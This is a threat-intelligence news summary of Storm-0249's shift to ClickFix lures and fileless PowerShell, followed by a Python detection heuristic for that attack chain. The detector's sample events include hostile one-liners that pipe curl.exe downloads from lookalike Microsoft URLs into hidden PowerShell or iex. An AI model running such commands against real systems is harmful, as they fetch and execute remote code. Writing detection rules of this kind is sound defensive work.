
"The threat actor known as Storm-0249 is likely shifting from its role as an initial access broker to adopt a combination of more advanced tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. "These methods allow them to bypass defenses, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams," ReliaQuest said in a report shared with The Hacker News."
"The latest findings from ReliaQuest demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue. In this case, the command copied and executed leverages the legitimate "curl.exe" to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust ("sgcipl[.]com/us.microsoft.com/bdo/") and execute it in a fileless manner via PowerShell."
Storm-0249 is transitioning from selling initial access footholds to adopting active intrusion techniques that directly enable ransomware operations. The actor employs domain spoofing to impersonate trusted Microsoft domains and uses ClickFix social engineering to trick users into running malicious commands via the Windows Run dialog. The group executes fileless PowerShell payloads fetched using legitimate tools like curl.exe to avoid detection, then runs an MSI with SYSTEM privileges to drop trojanized DLLs via DLL side-loading. These tactics enable persistence, evade defenses, and provide ransomware gangs with pre-compromised networks for monetization.
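As an added defensive example (not code from the ReliaQuest report or The Hacker News article), the Python below scores process-creation events for the ClickFix chain summarised above: a command launched from the Run dialog (parent explorer.exe) that uses curl.exe to fetch from a URL where "microsoft.com" appears only as a path segment or subdomain label and hands the result to PowerShell without writing a script to disk. The event field names, the example.net host and every sample command line are constructed; the sgcipl[.]com path is the indicator quoted above, kept defanged.

```python
"""Heuristic detection for the ClickFix -> curl.exe -> fileless PowerShell chain.
Event fields and sample command lines are constructed for this example; the
sgcipl[.]com path is the indicator quoted above, kept defanged."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
# Script piped to PowerShell's stdin ("| powershell ... -") or evaluated with iex.
FILELESS_RE = re.compile(r"\biex\b|invoke-expression|\|\s*(powershell|pwsh)[^|]*\s-\s*$")

def refang(text):  # defanged indicators -> the form a real log would hold
    return text.replace("[.]", ".").replace("hxxp", "http")

def is_lookalike(url, brand="microsoft.com"):
    """True when the brand appears in the host or path but is not the registered domain.
    Registered domain = last two labels (simplification; use a public-suffix list in production)."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    if ".".join(host.split(".")[-2:]) == brand:
        return False
    return brand in host or brand in u.path.lower()

def classify(event):
    """List the suspicious traits found in one process-creation event."""
    low = refang(event["cmd"]).lower()
    reasons = []
    if any(is_lookalike(u) for u in URL_RE.findall(low)):
        reasons.append("microsoft.com lookalike URL")
    if "curl" in low and ("powershell" in low or "pwsh" in low):
        reasons.append("curl output handed to PowerShell")
    if FILELESS_RE.search(low):
        reasons.append("fileless execution, no script written to disk")
    if reasons and event["parent"].lower() == "explorer.exe":
        reasons.append("parent explorer.exe (Run dialog launch)")
    return reasons

def alerts(events, min_reasons=2):
    """(id, reasons) for events that reach the trait threshold."""
    return [(e["id"], r) for e in events if len(r := classify(e)) >= min_reasons]

EVENTS = [  # constructed Sysmon-style process-creation events
    {"id": "e1", "parent": "explorer.exe",
     "cmd": "cmd /c curl.exe -s https://sgcipl[.]com/us.microsoft.com/bdo/ | powershell -nop -w hidden -"},
    {"id": "e2", "parent": "explorer.exe",
     "cmd": 'powershell -ep bypass -c "iex (curl.exe -s https://update.microsoft.com.example.net/verify)"'},
    {"id": "e3", "parent": "explorer.exe",
     "cmd": "curl.exe -s https://www.microsoft.com/en-us/download/tool.msi -o tool.msi"},
    {"id": "e4", "parent": "cmd.exe", "cmd": 'powershell -c "Get-Process | Out-File proc.txt"'},
]
```

Running `alerts(EVENTS)` flags e1 and e2 only; the legitimate Microsoft download in e3 is not reported because microsoft.com is its registered domain.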
Read at The Hacker News